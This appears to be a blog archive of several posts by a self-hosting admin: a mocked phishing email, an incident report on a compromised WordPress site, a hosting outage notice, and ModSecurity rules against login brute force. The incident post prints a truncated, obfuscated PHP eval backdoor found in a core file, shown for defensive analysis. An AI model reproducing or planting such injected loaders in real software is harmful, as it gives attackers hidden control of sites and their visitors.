Quote of the Day – Ry Jones (2/24/2014)

In WireShark I trust.

Ry JonesThere is no evidence to support that claim.
February 24th, 2014

[Yup.  As a geek this kicked over my giggle box.  Doubly so since I've been in that same position.

Well I don't care what you say, WireShark shows no traffic related to X when you're process is running.  So you're craps broken, deal with it!

I've noticed it is a unique individual who will just willingly admit, "Yup I screwed up, give me a couple minutes so I can fix that." Most of the time people are more interested in saving face and making themselves not look bad.

I find it better to look good by admitting my mistake and fixing the problem, but that's just me.  -B]

This made me laugh…

I was about to just straight up bit bucket this thing but decided to at least take a look since all I saw was the name when I glanced on my phone.  I’m glad I did because I needed a good laugh.

From: Amy <[email protected]>
Subject: ATTENTION the-minuteman.org OWNER!!!

Message Body:
Hello the-minuteman.org owner,

My name is Amy and I am a private investigator with 20 years of experience. PLEASE READ THIS MESSAGE SERIOUSLY! While browsing the internet just now, I found out there are some people talking BAD about your website the-minuteman.org at a few online forums and Facebook groups. They are creating Bad Reputation about your website the-minuteman.org! They even say the-minuteman.org is a big liar and many people had believed them!

I decided to capture some screen shots of their activities and make it into a FREE report for you.

Please download the report that I made for your website the-minuteman.org here : [link removed for safety]

Your contact form does not allow file upload, so I uploaded it into a free file hosting site called cleanfiles.net, they host files for free so you are required to complete a short survey before downloading your report.

Take a look into this matter RIGHT NOW! Download your report here : [link removed for safety]

P/S: I am just trying to help. If you DON’T CARE about your REPUTATION you can ignore my message.


This mail is sent via contact form on The Minuteman http://www.the-minuteman.org

Obviously you’re not familiar with me or this website.  I am well known and take pleasure in the idea that some people hate me.  I’m well aware of people writing bad things about me on the internet.  I just make sure when I find it I return the favor.

I’m reasonably sure Amy that my reputation with those I actually respect is quite well intact.  In the words of Winston Churchill:

You have enemies? Good. That means you’ve stood up for something, sometime in your life.

Thanks for confirming I’ve done my job.

Quote of the Day–Me* 6/12/2013

Good lord, that a lot of porn.  How could the NSA categorize it and make sure they have everyone’s kinks right?

Barron – Conversation

June 12th, 2013

[For context I read this article this morning which had this note in it:

Considering that, according to Cisco, the total world Internet traffic for 2012 was 1.1 exabytes per day…

My immediate thought was that was a whole lot of porn and bitching across the internet.  I then someone asked me why I said wow.  To which I informed them of the 1.1 exabyte estimate and immediately followed it with the quote above… It seems the prudent comment to make.

If you don’t understand why I would think that would be a prudent comment to make, I give you:


*It’s my blog and I can quote myself if I damn well please!]

Zombies are Real and Infectious…


That is of course unless you supply a couple well placed rounds to the upper cranial cavity once you discover their plight.

Let me start off at the beginning.  Over the past month I’ve been busy working on polishing the finishing edges of my new VPS.  I’ve spent a lot of time securing it and going through everything I can to provide me the best probabilities for survival when the inevitable finally happens.

Last weekend I migrated Linoge and Weer’d over to the new server as well since I had finished hammering out the last of the kinks with the help of the LiquidWeb support team.

I moved Linoge over and had a few minor oddities which I quickly fixed and got taken care of.  From there I set my sights on moving Weer’d

I logged in, dumped the database, tar’d up the site.  The tar fails, odd, what do you mean you couldn’t read that file?  Didn’t think much of it, found the file, odd the permissions are 000.  This isn’t my site though and I’m not sure if there was something special done so I fix it.  Total I fix 8 files like this.  I move the site over, and get him set up on the new server.  It actually went even smoother than Linoge and didn’t require a weird step.

Fast forward 24 hours to when I begin my evening log check.  I run tail /var/log/messages.  What I see does not provide me comfort.

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ’′, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

May  5 22:34:06 clark suhosin[26061]: ALERT – script tried to increase memory_limit to 268435456 bytes which is above the allowed value (attacker ’′, file ‘/home/weerd/public_html/wp-includes/post-template.php’, line 694)

What!?  I promptly dump open that file and am greeted by the following:


* Applies custom filter.


* @since 0.71


* $text string to apply the filter

* @return string


function applyfilter($text=null) {


  if($text) @ob_start();

  if(1){global $O10O1OO1O;$O10O1OO1O=create_function(‘$s,$k’,"\44\163\75\165\162\154\144\145\143\157\144\145\50\44\163\51\73\40\44\164\141\162\147\145\164\75\47\47\73\44\123\75\47\41\43\44\45\46\50\51\52\53\54\55\……………\164\56\75\44\143\150\141\162\73\40\175\40\162\145\164\165\162\156\40\44\164\141\162\147\145\164\73"); if(!function_exists("O01100llO")){function O01100llO(){global $O10O1OO1O;return call_user_func($O10O1OO1O,‘od%2bY8%23%24%3fMA%2aM%5dnjjMjBBPP%3eF%27VzBPp%5ez1h%27%27hIm%2bKKbC0XJ%5e%3b%60%40Bd44d%22%2eULLtT1MMZf%3eZSRt%22%2a%2a0y%5cjj%291%………………….%3eBhG%27%7dl’,6274);}call_user_func(create_function(,"\x65\x76\x61l(\x4F01100llO());"));}}

  if($text) {$out=@ob_get_contents(); @ob_end_clean(); return $text.$out;}


Now, for those who may not realize it, that odd text in there I immediately recognized as obfuscated code… that was in the middle of a standard WordPress installation.  Das Not Good.  Promptly I shifted into Defcon 2, the good news was the IP in the log was Google crawling the site.  I promptly bump an email to Weer’d along with everyone else about this new Charlie Foxtrot.

I have no idea how severe this incident is at this point I trust absolutely no one.  My first order of business is to close the problem that I now see.  I manually reinstall WordPress overwriting ALL the existing files on the server.  This promptly stops those trailing messages in my log.  Something new happens though.

Weer’d has WordFence security, fantastic plugin and I highly suggest it, and I run a scan, it say’s nothing is wrong.  I call BS.  There is no way that’s it.  I do a diff with another site that is known good and discover a pile of files.


There’s the list in a little more file friendly form.  I promptly removed and reinstalled the WordFence plugin.  This is where things get interesting.  I see this in the scan output

Mon, 06 May 13 02:45:03 +0000::1367822703.7602:2:info::Adding issue: This file appears to be an attack shell

Mon, 06 May 13 02:45:03 +0000::1367822703.7594:2:info::Adding issue: This file appears to be an attack shell

And I had to keep running the scan over and over.  I finally just resort to nuking everything, double checking from a shell and then reinstalling what I do actually want to keep.  Overall this is very little.  Every time I run a scan after fixing something I find something new.  Eventually I discover that the theme has been compromised.  Dump the theme and replace it.  Overall there were both stock WordPress files that were compromised along with additional files that were added but made to look legitimate.

After a short while I had the site cleaned up.  I will do a more through cleaning but that was the immediate action remedy for BF 30 in the am Sunday night.

I do however want to investigate the details of this.  I login to the old server and start looking around.  All the exploits are still present, so that means it was prior to the move and then I look at the root directory:


Do you see it?  Here’s the dump of what’s inside:


Now if you closely pay attention you can gleam a few important facts from the above.  First, they had multiple exploits to get back in.  Second, they obtained root access on the box.  In hindsight I noticed a few things (other than the interesting file name that should have been a giant fucking red flag) such as .bash_history not working correctly.  Lastly though we can note the date for the last edit October 5th, 2012.

There’s a reason that rung a bell with me.  From an article dated Oct 3, 2012

The distributed denial-of-service (DDoS) attacks—which over the past two weeks also caused disruptions at JP Morgan Chase, Wells Fargo, US Bancorp, Citigroup, and PNC Bank—were waged by hundreds of compromised servers. Some were hijacked to run a relatively new attack tool known as "itsoknoproblembro." When combined, the above-average bandwidth possessed by each server created peak floods exceeding 60 gigabits per second.

More unusually, the attacks also employed a rapidly changing array of methods to maximize the effects of this torrent of data. The uncommon ability of the attackers to simultaneously saturate routers, bank servers, and the applications they run—and to then recalibrate their attack traffic depending on the results achieved—had the effect of temporarily overwhelming the targets.

It appears I found a zombie that was sleeping in my friends place and inadvertently moved him.  That’s OK though, upon finding him I filled him full of 00 Buck Shot and did a mag dump from the AR for good measure.  I will also be killing the entire area with fire here when I get a bit more free time.

My actions though are leaps and bounds beyond what Dreamhost is doing and remember they’re the one’s who actually suffered a data breach and have a sever where root was compromised.

Thank you for writing.  Let us assure you that you’re not on your own!  We’re here to guide you through this process as much as we possibly can.  By the time you’re reading this email we have attempted to clean some basic rudimentary hacks out of your account and fix any open permissions; any actions taken will be noted below.
Going forward, we need you to take care of some basic site maintenance steps to ensure that your account has been secured.  To get started, please read and act on all of the information in the email below.  Since it involves editing and potentially deleting data under your users we are not able to complete all tasks for you.  If you have questions about the noted items please provide as much information and detail as possible about where you are getting stuck and we will do our best to assist you.
Here’s another area where we’re able to help — if you would like us to scan your account again for vulnerabilities after you have completed some or all of the steps below, please reply to this email and request a rescan and we can then verify your progress or if there are any lingering issues.
Most commonly hacking exploits occur through known vulnerabilities in outdated copies of web software (blogs, galleries, carts, wikis, forums, CMS scripts, etc.) running under your domains.  To secure your sites you should:
1) Update all pre-packaged web software to the most recent versions available from the vendor.  The following site can help you determine if you’re running a vulnerable version:
– Any old/outdated/archive installations that you do not intend to maintain need to be deleted from the server.
You should check any other domains (if applicable) for vulnerable software as well, as one domain being exploited could result in all domains under that user being exploited due to the shared permissions and home directory.
2) Remove ALL third-party plugins/themes/templates/components after upgrading your software installations, and from those that are already upgraded under an infected user.  After everything is removed, reinstall only the ones you need from fresh/clean downloads via a trusted source.  These files typically persist through a version upgrade and can carry hacked code with them.  Also, many software packages come with loads of extra content you don’t actually use and make searching for malicious content even harder.
3) Review other suspicious files under affected users/domains for potential malicious injections or hacker shells.  Eyeballing your directories for strangely named files, and reviewing recently-modified files can help.  The following shell command will search for files modified within the last 3 days, except for files within your Maildir and logs directories.  You can change the number to change the number of days, and add additional grep exception pipes as well to fine-tune your search (for example if you’re getting a lot of CMS cache results that are cluttering the output).
find . -type f -mtime -3 | grep -v "/Maildir/" | grep -v "/logs/"
In scanning your weerd user we found 3 hacked files that we were able to try and clean.  Backups of the original hacked files can be found at /home/weerd/INFECTED_BACKUP_1367876582 under your user, with a full list of the original files at /home/weerd/INFECTED_BACKUP_1367876582/cleaned_file_list.txt.  You should verify that your site is working fully after being cleaned and then delete the INFECTED_BACKUP directory fully.
Likely hacked code / hacker shells that we could not automatically clean were found under weerd here:
Likely hacked code / hacker shells that we could not automatically clean were found under jp556 here:
For information specific to WordPress hacks please see:
More information on this topic is available at the following URL under the "CGI Hack" and "Cleaning Up" sections:

Seriously… A shared hosting server, not a VPS mind you, where there is evidence of a shell compromise that resulted in Root access and your response is, “Here we’ll help you remove the malicious code from your site.”  Uh, already done that sparky but the bad news is that’s like closing the barn door after the cow has gotten out.  Or more specifically closing the front door and locking it after the serial killer has gotten into your house.  You really think those guys didn’t create backdoors in other sites? 

The real reason we were informing you is because you have a breach which placed everyone who has data on that server in danger.  I’m root, I can just go and place whatever exploit I want in whoever’s code I want.  I don’t think you understand why I had Linoge contact you boy genius.

Yes I understand you want to look good and not like a complete idiot in front of your customers.  Know what though “Pride goes before destruction, a haughty spirit before a fall.”  I was informing you because this is serious and at least an acknowledgement of, “thank you, we will get right on that” would be smart.  Try having to deal with constant outages and not being sure exactly why it’s happening.  It sucks, every time something goes wrong I think my forehead gets flatter from my desk.  Luckily at this point I think it’s solved and todays was a bit of an odd duck that only affected one site but I digress.

Linoge informed me his server issues started late last September/early October and have continued right up to today.  Well I’m sorry but we have heavy signs of enemy action and that is no coincidence.  That server is most likely still compromised at the root level and it appears Dreamhost has no interest in fixing it.  With a shared host your attack surface area is much larger and your odds of compromise increase.  So does the damage from a root compromise.

So remember folks, digital zombies exist, they are contagious if you’re not careful, and are best dealt with a serious dose of heavy metal positing followed by a tactical nuke to the general vicinity.  Be very careful too, sites you may think are safe may have actually been compromised.  Now hopefully I can get all the other stuff I’m trying to get done and finally get some sleep.  Constant 0200 bedtimes with 0630 rise times are eating me whole.

How I know I moved to the right host

There have been teething issues over the past week.  I’m still working out a lot of the kinks, but there was a relatively big incident last Friday.  Let me just let my hosting provider give the overview of what happened, the analysis, and their corrective actions.

Dear Customer,

Earlier today, we had to perform emergency maintenance on a critical piece of power infrastructure. Our customers’ uptime is of critical importance to us and communication during these events is paramount.  At this time, power has been restored and servers are back online. Listed below is a timeline of events, record of ongoing communications, SLA compensation information and a detailed outline of the steps we’re taking to prevent against these issues in the future. If at anytime you have any questions please do not hesitate to call, email or chat.

Timeline of Events:

  • 11:00 – During a routine check of the data center by our Maintenance staff, the slight odor of smoke was detected. We immediately began a complete investigation and located the source of the smell; a power distribution unit in Liquid Web DC3, Zone B, Section 8 covering rows 10 & 11.
  • 11:05 – We discovered a manufacturer defect in the Power Distribution Unit (PDU).  This defect resulted in a high resistance connection which heated up to critical levels, and threatened to seriously damage itself and surrounding equipment.  This bad connection fed an electrical distribution panel which powers one row (Lansing Region, Zone B, Section 8, Row 11)  of servers which is part of our Storm platform.  We immediately tried to resolve the issue by tightening the connection while the equipment was still on, but it wasn’t possible. To properly resolve the situation and repair the equipment, we needed to de-energize the PDU to replace an electrical circuit breaker.
  • 11:15 – To avert any additional damage, we were forced to turn off the breaker which powered servers in Lansing Region, Zone B, Section 8, Row 11. All servers were shut down at this time.
  • 11:48 – Servers in Lansing Region, Zone B, Section 8, Row 10 began to be shut down.
  • 11:49 – Once it was safe to begin the work, we immediately removed the failed components and replaced them with spares.  We discovered that the failed connection was due to a cross threaded screw installed at the time of manufacture.  This cross threaded screw meant the connection wasn’t tightened fully, and resulted in a loose, high resistance connection which heated far beyond normal levels. Upon replacing the breaker, we re-energized the PDU and customer servers.  Our networking and system restore teams have been working to ensure every customer comes back online as soon as possible.
  • 12:52 – Power was restored and servers began to be powered back on.

Communication During Event

We know that in the event of an outage, communication is of critical importance.  As soon as the issues were identified we provided the following updates on the Support Page and an “Event” which emails the customer as well as provides an alert within the manage.liquidweb.com interface.

Event Notice on Support Page:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting a small number of Storm servers in Zone B. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion. “

Event Notice Emailed to Customers:

“We are currently undergoing emergency maintenance on critical power infrastructure affecting 1 or more of your Storm instances. Work is expected to take approximately 2 hours. During this event affected instances will be powered down. We apologize for the inconvenience this will cause. An update will be provided upon completion.”

SLA Compensation

Liquid Web’s Service Level Agreement (SLA) provides customers the guarantee that in the event of an outage the customer will receive a credit for 10 times (1,000%) the actual amount of downtime. From our initial research into this event it appears as though most customers experienced between 1 hour and 2 hours of downtime.  However, due to the disruptive nature of this event we are providing a minimum of 1 full day of SLA coverage for any servers that were affected by this event.  Please contact support if you have any additional information regarding this event of if you would like to check on the status of your SLA request.

Liquid Web TOS Network SLA

Network SLA Remedy
In the event that Liquid Web does not meet this SLA, Dedicated Hosting clients will become eligible to request compensation for downtime reported by service monitoring logs. If Liquid Web is or is not directly responsible for causing the downtime, the customer will receive a credit for 10 times ( 1,000% ) the actual amount of downtime. This means that if your server is unreachable for 1 hour (beyond the 0.0% allowed), you will receive 10 hours of credit.

All requests for compensation must be received within 5 business days of the incident in question. The amount of compensation may not exceed the customer’s monthly recurring charge. This SLA does not apply for any month that the customer has been in breach of Liquid Web Terms of Service or if the account is in default of payment.

Moving forward

All PDU’s will be inspected for the same issue for all panels and all main breakers.

In this case, this PDU was just recently put into service.  When we purchase critical power equipment, the manufacturer performs an onsite startup procedure. This equipment check includes a physical inspection, phase rotation, voltage checks, alarm checks and many more.  This particular manufacturer defect didn’t avail itself until the PDU was under a significant amount of load.  Once the manufacturer defect began, the screw at the bus finger began to overheat. Once this overheating began, the resistance increased causing a serious risk of catastrophic failure.

Going forward, Liquid Web will perform additional tests, above and beyond our manufacturer startup procedures, on new equipment to look for manufacturer related defects and issues. We will now perform testing at full load by utilizing a Power Load Banking System.  This testing procedure was already in place for the vast majority of our power equipment but now will also include PDU specific testing.

Liquid Web performs preventative maintenance (PM) on all PDU’s.  This PM is an inspection that consists of current draw recording on all branch circuit breakers, infrared imaging of main connection points and on the transformers and a general inspection.  This is typically a quarterly inspection.

Yeah, I can’t argue with a company that honest.  Plus they go out of their way to help solve problems which technically may not even be their problem or responsibility. 

Oh, and I2R losses as always, are a pain in the ass.

0 to Attacked in No Time Flat

So as I’ve mentioned previously I’ve moved to the world of a VPS which for all intents in purposes is much like being self-hosted.  I used to do this stuff a long time ago, I still do it but not nearly as intensively and for the most part my shell-fu has gotten rusty.

I spent the first part of Saturday getting the server setup and figuring out WHM and cPanel, both unbelievably easy.  The biggest issue was making sure I had things locked down.  I just set up this server though, who could possibly be attacking it?

A6WLUZ bandwidth (full)

Bandwidth usage since I turned on the server.

You can see where I turned the server on on the 13th.  Notice that big spike shortly there after, yeah that was a huge influx of traffic.  It caused the server to grind to a halt.  At the time I thought it was related to me bringing up my site since it locked up within minutes and I had tweaked some server settings an thought that caused the instability.

Come Monday morning I have an email from A Girl that she cannot get in and 2 from the data-center that they rebooted the server after it ran out of memory and locked up.


System loading and availability since being turned on.

You cant see it as well except for the latest incident in those images but there is a serious proc-load spike when those bandwidth spikes occur.  I promptly switched from APF to CSF for my firewall so I could gain use of the LFD.  I spent my time installing and configuring it last night.

A6WLUZ Detail

The Proc Spike I had overnight.



A more detailed image of the bandwidth spikes.

There you can see the proc spike from an an incident last night.  I did a few more tweaks to the CSF and you can see things were better when they tried again about an hour later.  In the middle of all of this I also discover that there is a way to have Apache watch all the wp-login pages for failed logins.  When they happen, block and ban the IP after numerous failed attempts.  This is why I called myHosting lazy and was so pissed about their approach in handling the problem.

If you are a server administrator and want to protect against the WordPress brute force attack it is quite simple, doubly so if you have WHM.

Login to WHM, goto Software-EasyApache.  Follow the onscreen instructions and rebuild Apache but make sure the modsec2 module is selected.  Build Apache.

Once built, log in to your shell and edit /usr/local/apache/conf/modsec2.user.conf and add the following.

#Block WP logins with no referring URL
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000210
<Locationmatch “/wp-login.php”>
SecRule REQUEST_METHOD “POST” “deny,status:401,id:5000211,chain,msg:’wp-login request blocked, no referer’”
SecRule &HTTP_REFERER “@eq 0″

#Wordpress Brute Force detection
SecAction phase:1,nolog,pass,initcol:ip=%{REMOTE_ADDR},id:5000212
<Locationmatch “/wp-login.php”>
# Setup brute force detection.
# React if block flag has been set.
SecRule ip:bf_block “@gt 0″ “deny,status:401,log,id:5000213,msg:’ip address blocked for 5 minutes, more than 10 login attempts in 3 minutes.’”
# Setup Tracking. On a successful login, a 302 redirect is performed, a 200 indicates login failed.
SecRule RESPONSE_STATUS “^302″ “phase:5,t:none,nolog,pass,setvar:ip.bf_counter=0,id:5000214″
SecRule RESPONSE_STATUS “^200″ “phase:5,chain,t:none,nolog,pass,setvar:ip.bf_counter=+1,deprecatevar:ip.bf_counter=1/180,id:5000215″
SecRule ip:bf_counter “@gt 10″ “t:none,setvar:ip.bf_block=1,expirevar:ip.bf_block=300,setvar:ip.bf_counter=0″

Save the file and restart Apache.  This will help stop the brute force attacks.  If it wasn’t for the off chance of false positives, I’d be good with a perma-ban and dropping that axe like a rock….

Funny story, I dropped that !@#$ing ax on myself tonight.  Most of the other services are watched by LFD and when you get multiple login failures, it drops the ax and hard.  I screwed up logging in and paid the price.  I was just going along minding my own business and tried to login a couple times with the wrong password and bam there I am behind a curtain with some asshole molesting my balls.  Man, when I describe it like that it sounds like my intrusion detection system works for the TSA.

In the mean time the folks I got the VPS from (they’ve been fantastic support wise, unlike that previous host) are looking into trying to figure out what’s causing the load spikes.  The bummer is it randomly happens so it’s a paint to catch in the act. The good news is the past couple slams the server has actually survived so it’s almost there.  Security wise it isn’t a concern, it’s just and issue with service.

It’s a Weird Feeling

Through my online travels I’ve ended up meeting and getting to know a lot of people in digital space.  Most of these people I would have never met otherwise and due to the nature of the online relationship I know more about them than many people I do know in meat-space.

So it’s a weird feeling thinking of someone as a friend that honestly I’ve never actually met in meat-space.  I’ve got plenty of them, including a bunch I have also met in meat-space, but the saddest most helpless feeling is seeing one of my friends in trouble, with not a damn thing I can do.  Especially when it drags on in a manner that doesn’t seem to end.

As another one of my friends said:

She’s going to be just fine. I mean really, whose side do you want to be on? Tam’s or cancer’s?

I betting on Tam.

Jennifer is right, Tam will be fine.  It did however remind me of something that has been discussed before.  The wonder that is the internet and the expansion and alterations to the boundaries of our “tribes”.

There are many who wouldn’t have moved into my circle of friends if it hadn’t been for this invention known as the internet.  It’s nice having it here though because even in the middle of this whole mess I’m reminded of why I love this community and why I’m so glad to be a part of it.

Go give Tam some words of support.  One of these day’s I’ll finally get to meet her, I’ve got some other friends who have met her and have had nothing but nice things to say about her personality in meat-space.

Quote of the Day – Jennifer Hast (1/22/2013)

I’ll not rejoice if your delusions come crashing down.  I’ll not celebrate the day you discover that evil comes in many forms and will use any tool available. I hope that day never comes. Truly, I hope you live out all of your days in blissful ignorance and die peacefully in your old age.

JenniferI’ll Not Rejoice
January 21st, 2013

[Honestly go read her post, it is something that many of us on this side of the debate have encountered all too often recently.  We all know that anti-rights cultists are violent and down right despicable in what they say and how they act.  If you're on the other side of the debate, think long and hard about the actions and words of your fellow supporters.

It is the only way they can debate and appear to be winning.  Be so down right mean and vicious that the people on the other end want nothing to do with them.  I haven't been as active on the twitter front lately because honestly, the crap gets old, and most of them have absolutely no interest in an actual conversation.  They want to lecture us.

I did however have a nice conversation with a friend from high-school recently on Facebook and my patience was continued mainly because of the ties she had with my family growing up.  Honestly though I think it's those ties more than anything that helped facilitate a civil discussion and a willingness to listen to the other side of the debate.  That's the biggest issue right now, no one really wants to listen, they have their preconceived answers and are not even willing to be polite and listen to the other side.

The thing is, one side of this debate is listening and responding, for the most part there are some who aren't, the problem is the response more often than not is the opposite of what those on the other side want to hear.  As Joe said, we need an accurate problem statement.  No one though has even bothered to try to create one, instead they throw out solutions, solutions that in many cases don't actually solve any problems relating to what the proponents claim.  When people rebuke their solution they are played down, diminished, called names, and have violence wished upon them for a differing of opinion.

It does not help your position to behave in such a manner and to the many watching it indicates a lack of maturity and inability to support your position.  I am flattered by the comments that Garand Gal made about Linoge, Sean, Erin, and me.  But please don't feel like you have to support us.  Is it nice, you bet, fire support is a wonderful thing, especially when viciousness like that starts getting thrown around.  It's good to see a friendly face and it does give you that extra sense of, yes this is worth it.  But, and this is a big but, often it is emotionally draining and tiring.  In the end it ends up being nothing more than wrestling with a pig, sure you may think you win but the pig just wanted you covered in mud.

If you feel it's worth it to spend time discussing with someone, by all means do so, and if you see a reasonable discussion going on, by all means chip in, just don't be a dick, let them do it on their own if they're going to.  The time spent with chatting with my family friend paid off, she's no longer focused on the tool and can see from this side of the debate.  There's a few other things still to work out but it's a start and a good one at that.  Sadly she's not physically close otherwise I could go more easily hands on.  It ends up there were some people who made very poor decisions regarding firearms around her while in college and it has provided a very negative view of gun owners.

Pick and choose your battles and work where you think you can gain the most ground if you're going to spend a lot of time on it.  Last week a particular individual kept wasting my time and kept running in circles.  I kept trying to escape out of the conversation but she kept dragging me back.  Finally after calling me an extremist for not wanting to be lectured I asked to be dropped from the conversation.  She did, for about 30 minutes and then mentioned me in another tweet.  I went off, ripped apart her argument again, and then said leave me the hell alone.  She then tweeted me again, this time it wasn't falsehoods or lies just a general antagonism so ignored it, yesterday morning her account was evidently suspended.

Let me say right here right now, I had nothing to do with it.  I didn't report her, I didn't even block her.  I do however have a strong feeling with her behavior that she went down the same road as the individual debating with Jennifer.  In so doing I'm reasonably sure she used some not so nice words and possibly made threats towards someone's safety.  Honestly, that woman wasn't worth my time at all beyond illustrating to the world how dumb her idea was for "smart guns".  Pick and choose your battles wisely and do your best not to get sucked in because you have to constantly fight their lies, because that's what they do, spout lies and drivel so you come back with facts.  Some times it's just not worth it.  Overall though in the grand scheme, this fight is most definitely worth it and the effort of debate is a small price to pay. -B]